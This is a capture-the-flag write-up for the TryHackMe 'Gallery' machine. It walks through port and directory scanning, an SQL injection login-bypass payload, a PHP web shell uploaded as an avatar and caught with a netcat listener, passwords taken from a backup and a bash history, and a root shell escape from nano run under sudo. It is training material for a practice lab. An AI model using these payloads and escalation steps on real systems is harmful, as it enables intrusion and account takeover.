# CTF TryHackMe - Gallery

## Nmap

```bash
# Nmap 7.92 scan initiated Sat Feb 12 16:29:31 2022 as: nmap -sC -sV -oN nmap.log 10.10.57.112
Nmap scan report for 10.10.57.112
Host is up (0.083s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Simple Image Gallery System
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 16:30:00 2022 -- 1 IP address (1 host up) scanned in 29.41 seconds
```

## Using gobuster to enumerate website

Going to http://10.10.57.112:8080 It's a login form

Starting gobuster to see hidden directories

```bash
gobuster dir --url http://10.10.57.112/gallery  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_gallery.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.57.112/gallery
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/02/12 16:39:02 Starting gobuster in directory enumeration mode
===============================================================
/archives             (Status: 301) [Size: 323] [--> http://10.10.57.112/gallery/archives/]
/user                 (Status: 301) [Size: 319] [--> http://10.10.57.112/gallery/user/]    
/uploads              (Status: 301) [Size: 322] [--> http://10.10.57.112/gallery/uploads/] 
/assets               (Status: 301) [Size: 321] [--> http://10.10.57.112/gallery/assets/]  
/report               (Status: 301) [Size: 321] [--> http://10.10.57.112/gallery/report/]  
/albums               (Status: 301) [Size: 321] [--> http://10.10.57.112/gallery/albums/]  
/plugins              (Status: 301) [Size: 322] [--> http://10.10.57.112/gallery/plugins/] 
/database             (Status: 301) [Size: 323] [--> http://10.10.57.112/gallery/database/]
/classes              (Status: 301) [Size: 322] [--> http://10.10.57.112/gallery/classes/] 
/dist                 (Status: 301) [Size: 319] [--> http://10.10.57.112/gallery/dist/]    
/inc                  (Status: 301) [Size: 318] [--> http://10.10.57.112/gallery/inc/]     
/build                (Status: 301) [Size: 320] [--> http://10.10.57.112/gallery/build/]   
/schedules            (Status: 301) [Size: 324] [--> http://10.10.57.112/gallery/schedules/]
                                                                                            
===============================================================
2022/02/12 17:06:11 Finished
===============================================================
```

But nothing helpful...

## Trying to perform SQLi

Using this payload as **username**

```
admin' or '1'='1'#
```

And yeahh we are in!


## Trying to get RCE

Now we are login as admin, we need to find how to get an RCE. Go to **http://10.10.57.112/gallery/?page=user**

Uploaded PHP shell as Avatar, start nc listener and we are in : 

```bash
nc -lnvp 1234                         
[..SNIP..]
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## PrivEsc

Now running linpeash to see how to upgrade our shell as mike. Found cool informations

```
-rwxr-xr-x 1 root root 103 May 24  2021 /var/backups/mike_home_backup/
```

Let's check if we can get passwords :

```bash
www-data@gallery:/var/backups/mike_home_backup/documents$ cat accounts.txt
cat accounts.txt
Spotify : mike@gmail.com:mycat666
Netflix : mike@gmail.com:123456789pass
TryHackme: mike:darkhacker123
```

But no password good...

Let's check the bash_history :

```bash
www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb3stpassw0rdbr0xx
clear
sudo -l
exit
```

Trying this password : **b3stpassw0rdbr0xx**

```bash
su mike 
Password: b3stpassw0rdbr0xx
```

It's work!!

```bash
mike@gallery:/var/backups/mike_home_backup$
```

## PrivEsc to root

Let's get root, first list our sudo permissions

```bash
mike@gallery:/var/backups/mike_home_backup$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
```

Go check rootkit.sh

```bash
cat rootkit.sh
#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac
```

We can use nano to get root shell. But to open nano we need to setup our terminal

```
Ctrl-Z

stty raw -echo;fg

<enter twice>

export TERM=xterm
```

Then execute **rootkit.sh** with sudo

```bash
sudo /bin/bash /opt/rootkit.sh
```

Indicate **read**


Then let's pop a root shell in nano

```
^R^X
reset; sh 1>&0 2>&0
```

And we are root! :D
